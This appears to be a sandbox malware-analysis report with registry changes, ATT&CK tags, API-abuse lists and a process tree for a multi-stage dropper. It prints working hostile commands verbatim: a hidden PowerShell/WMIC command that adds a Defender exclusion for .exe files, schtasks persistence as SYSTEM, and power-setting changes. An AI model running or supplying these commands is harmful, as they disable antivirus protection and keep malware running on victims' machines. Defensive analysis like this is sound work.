Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d8c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	lILszpl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	gJyKMcC.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	lILszpl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4928	schtasks.exe
5000	schtasks.exe
4588	schtasks.exe
1860	schtasks.exe
3168	schtasks.exe
2928	schtasks.exe
2840	schtasks.exe
696	schtasks.exe
1252	schtasks.exe
2388	schtasks.exe
3724	schtasks.exe
4048	schtasks.exe
3576	schtasks.exe
4504	schtasks.exe
644	schtasks.exe
5112	schtasks.exe
4432	schtasks.exe
4768	schtasks.exe
4692	schtasks.exe
620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4616	1719859269.0326595_setup.exe
4616	1719859269.0326595_setup.exe
3616	Ze9YVyObNjAE_SzfO25PFdIY.exe
3616	Ze9YVyObNjAE_SzfO25PFdIY.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3620	powershell.exe
3620	powershell.exe
4768	powershell.exe
4768	powershell.exe
3620	powershell.exe
4768	powershell.exe
4484	MSBuild.exe
4484	MSBuild.exe
3416	RegAsm.exe
3416	RegAsm.exe
4780	MSBuild.exe
4780	MSBuild.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
4780	MSBuild.exe
4780	MSBuild.exe
332	GHJEHJJDAA.exe
332	GHJEHJJDAA.exe
3416	RegAsm.exe
3416	RegAsm.exe
2004	explorti.exe
2004	explorti.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
4780	MSBuild.exe
4780	MSBuild.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
3784	eqtpkqwqodik.exe
4780	MSBuild.exe
4780	MSBuild.exe
4500	explorti.exe
4500	explorti.exe
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
4824	powershell.EXE
4824	powershell.EXE
4824	powershell.EXE
3484	gJyKMcC.exe
3484	gJyKMcC.exe
3484	gJyKMcC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	91EY5fESvw87XKKeJ4tb98_g.exe
Token: SeDebugPrivilege	4484	MSBuild.exe
Token: SeBackupPrivilege	4484	MSBuild.exe
Token: SeSecurityPrivilege	4484	MSBuild.exe
Token: SeSecurityPrivilege	4484	MSBuild.exe
Token: SeSecurityPrivilege	4484	MSBuild.exe
Token: SeSecurityPrivilege	4484	MSBuild.exe
Token: SeDebugPrivilege	4344	XuoCgWFoVXNBZg44KsVDooUD.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4352	WMIC.exe
Token: SeSecurityPrivilege	4352	WMIC.exe
Token: SeTakeOwnershipPrivilege	4352	WMIC.exe
Token: SeLoadDriverPrivilege	4352	WMIC.exe
Token: SeSystemProfilePrivilege	4352	WMIC.exe
Token: SeSystemtimePrivilege	4352	WMIC.exe
Token: SeProfSingleProcessPrivilege	4352	WMIC.exe
Token: SeIncBasePriorityPrivilege	4352	WMIC.exe
Token: SeCreatePagefilePrivilege	4352	WMIC.exe
Token: SeBackupPrivilege	4352	WMIC.exe
Token: SeRestorePrivilege	4352	WMIC.exe
Token: SeShutdownPrivilege	4352	WMIC.exe
Token: SeDebugPrivilege	4352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4352	WMIC.exe
Token: SeRemoteShutdownPrivilege	4352	WMIC.exe
Token: SeUndockPrivilege	4352	WMIC.exe
Token: SeManageVolumePrivilege	4352	WMIC.exe
Token: 33	4352	WMIC.exe
Token: 34	4352	WMIC.exe
Token: 35	4352	WMIC.exe
Token: 36	4352	WMIC.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp
332	GHJEHJJDAA.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
2812	cmd.exe
512	afeb332148.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 2472	4616	1719859269.0326595_setup.exe	100
PID 4616 wrote to memory of 2472	4616	1719859269.0326595_setup.exe	100
PID 4616 wrote to memory of 2472	4616	1719859269.0326595_setup.exe	100
PID 4616 wrote to memory of 2500	4616	1719859269.0326595_setup.exe	102
PID 4616 wrote to memory of 2500	4616	1719859269.0326595_setup.exe	102
PID 4616 wrote to memory of 2500	4616	1719859269.0326595_setup.exe	102
PID 4616 wrote to memory of 4932	4616	1719859269.0326595_setup.exe	103
PID 4616 wrote to memory of 4932	4616	1719859269.0326595_setup.exe	103
PID 4616 wrote to memory of 4932	4616	1719859269.0326595_setup.exe	103
PID 4616 wrote to memory of 2296	4616	1719859269.0326595_setup.exe	105
PID 4616 wrote to memory of 2296	4616	1719859269.0326595_setup.exe	105
PID 4616 wrote to memory of 2296	4616	1719859269.0326595_setup.exe	105
PID 4616 wrote to memory of 396	4616	1719859269.0326595_setup.exe	101
PID 4616 wrote to memory of 396	4616	1719859269.0326595_setup.exe	101
PID 4616 wrote to memory of 1988	4616	1719859269.0326595_setup.exe	104
PID 4616 wrote to memory of 1988	4616	1719859269.0326595_setup.exe	104
PID 4616 wrote to memory of 1988	4616	1719859269.0326595_setup.exe	104
PID 4616 wrote to memory of 3616	4616	1719859269.0326595_setup.exe	106
PID 4616 wrote to memory of 3616	4616	1719859269.0326595_setup.exe	106
PID 4616 wrote to memory of 3616	4616	1719859269.0326595_setup.exe	106
PID 4616 wrote to memory of 5112	4616	1719859269.0326595_setup.exe	107
PID 4616 wrote to memory of 5112	4616	1719859269.0326595_setup.exe	107
PID 4616 wrote to memory of 5112	4616	1719859269.0326595_setup.exe	107
PID 4616 wrote to memory of 3568	4616	1719859269.0326595_setup.exe	108
PID 4616 wrote to memory of 3568	4616	1719859269.0326595_setup.exe	108
PID 2472 wrote to memory of 1884	2472	hxXD2z1F2ET9Jb9lGMrJdK0J.exe	109
PID 2472 wrote to memory of 1884	2472	hxXD2z1F2ET9Jb9lGMrJdK0J.exe	109
PID 2472 wrote to memory of 1884	2472	hxXD2z1F2ET9Jb9lGMrJdK0J.exe	109
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2296 wrote to memory of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 2500 wrote to memory of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 1988 wrote to memory of 3056	1988	2PvIYDFdouKLqGQ2H2IucpPB.exe	114
PID 1988 wrote to memory of 3056	1988	2PvIYDFdouKLqGQ2H2IucpPB.exe	114
PID 1988 wrote to memory of 3056	1988	2PvIYDFdouKLqGQ2H2IucpPB.exe	114
PID 5112 wrote to memory of 1976	5112	PdQ0NyUVaIjka90FqWF0QLmr.exe	116
PID 5112 wrote to memory of 1976	5112	PdQ0NyUVaIjka90FqWF0QLmr.exe	116
PID 5112 wrote to memory of 1976	5112	PdQ0NyUVaIjka90FqWF0QLmr.exe	116
PID 3616 wrote to memory of 4048	3616	Ze9YVyObNjAE_SzfO25PFdIY.exe	117
PID 3616 wrote to memory of 4048	3616	Ze9YVyObNjAE_SzfO25PFdIY.exe	117
PID 3616 wrote to memory of 4048	3616	Ze9YVyObNjAE_SzfO25PFdIY.exe	117
PID 1884 wrote to memory of 4124	1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp	120
PID 1884 wrote to memory of 4124	1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp	120
PID 1884 wrote to memory of 4124	1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp	120
PID 3056 wrote to memory of 3216	3056	Install.exe	121
PID 3056 wrote to memory of 3216	3056	Install.exe	121
PID 3056 wrote to memory of 3216	3056	Install.exe	121
PID 1976 wrote to memory of 4248	1976	Install.exe	122
PID 1976 wrote to memory of 4248	1976	Install.exe	122
PID 1976 wrote to memory of 4248	1976	Install.exe	122
PID 1884 wrote to memory of 1032	1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp	123
PID 1884 wrote to memory of 1032	1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp	123

C:\Users\Admin\AppData\Local\Temp\1719859269.0326595_setup.exe
"C:\Users\Admin\AppData\Local\Temp\1719859269.0326595_setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Users\Admin\Documents\SimpleAdobe\hxXD2z1F2ET9Jb9lGMrJdK0J.exe
  C:\Users\Admin\Documents\SimpleAdobe\hxXD2z1F2ET9Jb9lGMrJdK0J.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Users\Admin\AppData\Local\Temp\is-RCGCT.tmp\hxXD2z1F2ET9Jb9lGMrJdK0J.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-RCGCT.tmp\hxXD2z1F2ET9Jb9lGMrJdK0J.tmp" /SL5="$7011C,5030672,54272,C:\Users\Admin\Documents\SimpleAdobe\hxXD2z1F2ET9Jb9lGMrJdK0J.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Users\Admin\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe
      "C:\Users\Admin\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:4124
  - - C:\Users\Admin\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe
      "C:\Users\Admin\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:1032
- C:\Users\Admin\Documents\SimpleAdobe\4Q_QZ9PDdTpSetEPSjPBGJSX.exe
  C:\Users\Admin\Documents\SimpleAdobe\4Q_QZ9PDdTpSetEPSjPBGJSX.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:396
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:3684
- C:\Users\Admin\Documents\SimpleAdobe\91EY5fESvw87XKKeJ4tb98_g.exe
  C:\Users\Admin\Documents\SimpleAdobe\91EY5fESvw87XKKeJ4tb98_g.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
- C:\Users\Admin\Documents\SimpleAdobe\BVyOzoVQkOWlrDwuVAspBWVl.exe
  C:\Users\Admin\Documents\SimpleAdobe\BVyOzoVQkOWlrDwuVAspBWVl.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHJEHJJDAA.exe"
    3⤵
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\GHJEHJJDAA.exe
      "C:\Users\Admin\AppData\Local\Temp\GHJEHJJDAA.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:332
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\1000006001\afeb332148.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\afeb332148.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DBKFHJEBAA.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    PID:2812
- C:\Users\Admin\Documents\SimpleAdobe\2PvIYDFdouKLqGQ2H2IucpPB.exe
  C:\Users\Admin\Documents\SimpleAdobe\2PvIYDFdouKLqGQ2H2IucpPB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Users\Admin\AppData\Local\Temp\7zSB7F6.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\7zSC0B0.tmp\Install.exe
      .\Install.exe /dEdidvbZmT "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:3216
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:744
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 18:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC0B0.tmp\Install.exe\" xv /NqXdidM 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4692
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bmQWCxleEgxbTUrSZz"
        5⤵
        
        PID:1028
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "nsbPTSdSgPuDRRbhc" /SC once /ST 05:06:30 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo\lexazqZPNEWTjjp\lILszpl.exe\" X4 /sadidIV 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:1252
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "nsbPTSdSgPuDRRbhc"
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 908
        5⤵
        Program crash
        
        PID:2420
- C:\Users\Admin\Documents\SimpleAdobe\DOyexE8ZA6NdRfJg6tnCsu7_.exe
  C:\Users\Admin\Documents\SimpleAdobe\DOyexE8ZA6NdRfJg6tnCsu7_.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3416
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 280
    3⤵
    - Program crash
    PID:3264
- C:\Users\Admin\Documents\SimpleAdobe\Ze9YVyObNjAE_SzfO25PFdIY.exe
  C:\Users\Admin\Documents\SimpleAdobe\Ze9YVyObNjAE_SzfO25PFdIY.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3576
- C:\Users\Admin\Documents\SimpleAdobe\PdQ0NyUVaIjka90FqWF0QLmr.exe
  C:\Users\Admin\Documents\SimpleAdobe\PdQ0NyUVaIjka90FqWF0QLmr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Users\Admin\AppData\Local\Temp\7zSB853.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\Users\Admin\AppData\Local\Temp\7zSC1BA.tmp\Install.exe
      .\Install.exe /COpjhdidRptFc "385137" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:4248
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4320
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4352
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 18:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC1BA.tmp\Install.exe\" 2Z /rIWdidbXI 385137 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:4768
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1176
        5⤵
        Program crash
        
        PID:4560
- C:\Users\Admin\Documents\SimpleAdobe\fuf1wD0JhgRWjKVyTjQfK3Vw.exe
  C:\Users\Admin\Documents\SimpleAdobe\fuf1wD0JhgRWjKVyTjQfK3Vw.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3568
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4320
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1128
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:852
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:452
- - C:\Windows\system32\sc.exe
